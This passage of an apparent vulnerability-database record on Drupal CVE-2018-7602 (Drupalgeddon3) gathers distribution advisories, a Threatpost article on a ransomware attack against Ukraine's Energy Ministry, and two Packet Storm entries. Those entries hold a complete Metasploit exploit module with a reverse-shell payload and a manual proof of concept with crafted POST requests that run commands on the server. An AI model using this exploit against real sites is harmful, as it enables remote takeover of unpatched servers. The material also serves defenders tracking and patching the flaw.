"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T09:28:04", "id": "DEBIAN:DLA-1365-1:59638", "href": "https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-01T15:51:08", "description": "Package : drupal7\nVersion : 7.14-2+deb7u19\nCVE ID : CVE-2018-7602\nDebian Bug : 895778\n\nA remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-26T09:28:04", "type": "debian", "title": "[SECURITY] [DLA 1365-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T09:28:04", "id": "DEBIAN:DLA-1365-1:21036", "href": "https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T19:02:35", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4180-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nApril 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7602\nDebian Bug : 896701\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-004\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T20:13:52", "type": "debian", "title": "[SECURITY] [DSA 4180-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T20:13:52", "id": "DEBIAN:DSA-4180-1:E5B13", "href": "https://lists.debian.org/debian-security-announce/2018/msg00107.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T23:48:36", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4180-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nApril 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7602\nDebian Bug : 896701\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-004\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T20:13:52", "type": "debian", "title": "[SECURITY] [DSA 4180-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T20:13:52", "id": "DEBIAN:DSA-4180-1:8EEC5", "href": "https://lists.debian.org/debian-security-announce/2018/msg00107.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:09", "description": "The Ukrainian Energy Ministry has been hit by a ransomware attack \u2013 and for once it looks like this is the work of amateurs, not nation-state attackers bent on making a geopolitical point. However, the bad actors appear to have made use of the recently patched Drupal vulnerability, pointing out yet once again that patch management needs to be a top security-posture priority for government and critical infrastructure organizations.\n\nSophisticated APT attackers have repeatedly targeted Ukrainian government networks and critical infrastructure in recent years, and most researchers have pointed the attribution finger squarely towards APTs such as BlackEnergy and threat actors behind malware Bad Rabbit and Petya/ExPetr. However, in this case, the attack seems to be financially motivated.\n\nResearchers suspect that the incident was two-pronged: First, a hacker (going by the handle \u201cX-zakaria,\u201d according to researchers at AlienVault quoted in a[ BBC](<http://www.bbc.com/news/technology-43877677>) report) was able to deface the website, while a second hacker then used the first actor\u2019s backdoor to go in an encrypt the website\u2019s files. The English-language ransom note is demanding 0.1 bitcoin, or about $928 as of this time of writing.\n\n**Limited Damage, Limited Skill**\n\nUkrainian-cyber police spokeswoman Yulia Kvitko called the damage \u201cisolated\u201d, resulting in the defacement and locking up of the ministry website. She [told](<https://www.reuters.com/article/us-china-tech-gender/chinese-tech-giants-government-under-fire-for-men-only-job-ads-idUSKBN1HV0EY>) _Reuters_ that the attacks didn\u2019t affect other government systems or the country\u2019s state-run energy companies.\n\n\u201cThis case is not large-scale. If necessary, we are ready to react and help,\u201d Kvitko said. \u201cOur specialists are working right now \u2026 We do not know how long it will take to resolve the issue. Ukrenergo, Energoatom \u2013 everything is okay with their sites, it\u2019s only our site that does not work.\u201d\n\n\u201cFrom what has been seen, it is clearly multiple cyber-actors, possibly working together, or not, though it\u2019s likely they have been in communication at the minimum,\u201d Joseph Carson, chief security scientist at Thycotic, told Threatpost.\n\nHe added that while the incident shows little advanced skill, it shouldn\u2019t be discounted: \u201cIt\u2019s very likely that the cybercriminals behind this recent cyberattack against the Ukrainian Energy Ministry are testing their new skills in order to improve for a bigger cyberattack later, or to get acceptance into a new underground cyber-group that requires showing a display of skills and ability,\u201d said Carson.\n\nIt\u2019s also interesting to note that the attack used ransomware, which at this point seems almost a throwback threat vector; recently, cryptomining [has gained top billing](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) for financially motivated types, thanks to the skyrocketing value of virtual currencies.\n\n\u201cRansomware has been waning as an overall attack vector, with only one device in every 10,000 showing signs of ransomware for the period of August 2017 through January 2018,\u201d Mike Banic, vice president of marketing at Vectra, told us. \u201cThe [WannaCry](<https://threatpost.com/u-s-government-blames-north-korea-for-wannacry/129201/>) attack collected approximately $72,000 in ransom. The industry responded to the NotPetya and WannaCry attacks by patching Windows systems to remove the Eternal Blue exploit and bolstering their data backup and recovery programs. As ransomware started to wane in 2017, we saw a rise in cryptomining, which has been prevalent in higher-education, technology companies and healthcare organizations.\u201d\n\n**An Avoidable Attack: Drupal Vulnerability Exploited**\n\nThe attackers appear to be exploiting the [Drupalgeddon2](<https://groups.drupal.org/security/faq-2018-002>), a highly critical remote code execution bug affecting most Drupal sites, which was disclosed at the end of March (and since patched). That bug is now being actively exploited by hackers stocked with automated tools, including a newly uncovered botnet, dubbed Muhstik, that we [reported on yesterday](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>).\n\nDrupal also [announced](<https://www.drupal.org/psa-2018-003>) this week that a new vulnerability (details are scant) is being patched April 25.\n\n\u201cLooking over the Internet archive of this site, it appears that they were running Drupal 7, which is currently under active attack by automated attackers armed with Drupalgeddon2 exploits,\u201d Craig Young, security researcher at Tripwire, said via email. \u201cIt is also possible (although less likely) that someone is already exploiting CVE-2018-7602 which the Drupal team announced just yesterday, but has yet to provide a public fix.\u201d\n\nOrganizations \u2013 especially those running critical, strategic networks, it goes without saying \u2013 should know that off-the-shelf content management systems like Drupal, WordPress and Joomla are widely deployed and a key target of automated exploits. In fact, these platforms may start seeing exploitation within days or even hours of a critical disclosure, added Young: \u201cThese public facing systems must be a top priority for infosec teams.\u201d\n", "cvss3": {}, "published": "2018-04-24T18:34:37", "type": "threatpost", "title": "Ransomware Attack Hits Ukrainian Energy Ministry, Exploiting Drupalgeddon2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-24T18:34:37", "id": "THREATPOST:BBF186A7D1D5679576FBB39E0B3F05F2", "href": "https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-05-07T01:19:11", "description": "", "cvss3": {}, "published": "2018-04-30T00:00:00", "type": "packetstorm", "title": "Drupalgeddon3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "PACKETSTORM:147407", "href": "https://packetstormsecurity.com/files/147407/Drupalgeddon3-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupalgeddon3', \n'Description' => %q{ \nCVE-2018-7602 / SA-CORE-2018-004 \nA remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. \nThis potentially allows attackers to exploit multiple attack vectors on a Drupal site \nWhich could result in the site being compromised. \nThis vulnerability is related to Drupal core - Highly critical - Remote Code Execution \n \nThe module can load msf PHP arch payloads, using the php/base64 encoder. \n \nThe resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SixP4ck3r', # Research and port to MSF \n'Blaklis' # Initial PoC \n], \n'References' => \n[ \n['SA-CORE', '2018-004'], \n['CVE', '2018-7602'], \n], \n'DefaultOptions' => \n{ \n'encoder' => 'php/base64', \n'payload' => 'php/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => [ARCH_PHP], \n'Targets' => \n[ \n['User register form with exec', {}], \n], \n'DisclosureDate' => 'Apr 29 2018', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']), \nOptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']), \nOptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']), \n]) \n \nregister_advanced_options( \n[ \n \n]) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef start_exploit \ndrupal_node = datastore['DRUPAL_NODE'] \nres = send_request_cgi({ \n'cookie' => datastore['DRUPAL_SESSION'], \n'method' => 'GET', \n'uri' => \"#{uri_path}/node/#{drupal_node}/delete\" \n}) \nform_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first \nprint \"[*] Token Form -> #{form_token}\\n\" \nr2 = send_request_cgi({ \n'method' => 'POST', \n'cookie' => datastore['DRUPAL_SESSION'], \n'uri' => \"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\", \n'vars_post' => { \n'form_id' => 'node_delete_confirm', \n'_triggering_element_name' => 'form_id', \n'form_token'=> \"#{form_token}\" \n} \n}) \nform_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first \nprint \"[*] Token Form_build_id -> #{form_build_id}\\n\" \nr3 = send_request_cgi({ \n'method' => 'POST', \n'cookie' => datastore['DRUPAL_SESSION'], \n'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\", \n'vars_post' => { \n'form_build_id' => \"#{form_build_id}\" \n} \n}) \nend \n \ndef exploit \ncase datastore['TARGET'] \nwhen 0 \nstart_exploit \nelse \nfail_with(Failure::BadConfig, \"Your target is invalid.\") \nend \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147407/drupalgeddon3-exec.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-27T01:05:58", "description": "", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "packetstorm", "title": "Drupal drupgeddon3 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "PACKETSTORM:147380", "href": "https://packetstormsecurity.com/files/147380/Drupal-drupgeddon3-Remote-Code-Execution.html", "sourceData": "`This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602. \n \nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm). \n \nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1 \n[...] \nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN] \n \nRetrieve the form_build_id from the response, and then triggering the exploit with : \n \nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1 \n[...] \nform_build_id=[FORM_BUILD_ID] \n \nThis will display the result of the whoami command. \n \nPatch your systems! \nBlaklis \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147380/drupalgeddon3-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "alpinelinux": [{"lastseen": "2022-07-20T18:06:51", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "type": "alpinelinux", "title": "CVE-2018-7602", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2021-04-20T12:52:00", "id": "ALPINE:CVE-2018-7602", "href": "https://security.alpinelinux.org/vuln/CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:04", "description": "Arch Linux Security Advisory ASA-201804-10\n==========================================\n\nSeverity: Critical\nDate : 2018-04-27\nCVE-ID : CVE-2018-7602\nPackage : drupal\nType : arbitrary command execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-679\n\nSummary\n=======\n\nThe package drupal before version 8.5.3-1 is vulnerable to arbitrary\ncommand execution.\n\nResolution\n==========\n\nUpgrade to 8.5.3-1.\n\n# pacman -Syu \"drupal>=8.5.3-1\"\n\nThe problem has been fixed upstream in version 8.5.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA remote code execution vulnerability exists within multiple subsystems\nof Drupal 7.x and 8.x. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code by performing a\nspecially crafted request.\n\nReferences\n==========\n\nhttps://www.drupal.org/sa-core-2018-004\nhttps://github.com/drupal/drupal/commit/bb6d396609600d1169da29456ba3db59abae4b7e\nhttps://security.archlinux.org/CVE-2018-7602", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-27T00:00:00", "type": "archlinux", "title": "[ASA-201804-10] drupal: arbitrary command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-27T00:00:00", "id": "ASA-201804-10", "href": "https://security.archlinux.org/ASA-201804-10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:29:30", "description": "A code execution vulnerability exists in Drupal Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Remote Code Execution (CVE-2018-7602)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "CPAI-2018-0355", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:52", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "type": "debiancve", "title": "CVE-2018-7602", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-07-19T17:29:00", "id": "DEBIANCVE:CVE-2018-7602", "href": "https://security-tracker.debian.org/tracker/CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:52", "description": "The request_path function in includes/bootstrap.inc in Drupal 7.14 and earlier allows remote attackers to obtain sensitive information via the q[] parameter to index.php, which reveals the installation path in an error message.", "cvss3": {}, "published": "2012-05-21T22:55:00", "type": "debiancve", "title": "CVE-2012-2922", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2922"], "modified": "2012-05-21T22:55:00", "id": "DEBIANCVE:CVE-2012-2922", "href": "https://security-tracker.debian.org/tracker/CVE-2012-2922", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-07-21T08:24:02", "description": "\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\n<https://www.drupal.org/sa-core-2018-004>\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/drupal7>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-07-21T05:49:50", "id": "OSV:DSA-4180-1", "href": "https://osv.dev/vulnerability/DSA-4180-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:19:31", "description": "\nA remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n7.14-2+deb7u19.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-07-21T05:52:07", "id": "OSV:DLA-1365-1", "href": "https://osv.dev/vulnerability/DLA-1365-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal that can allow attackers to exploit multiple attack vectors on a Drupal site.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 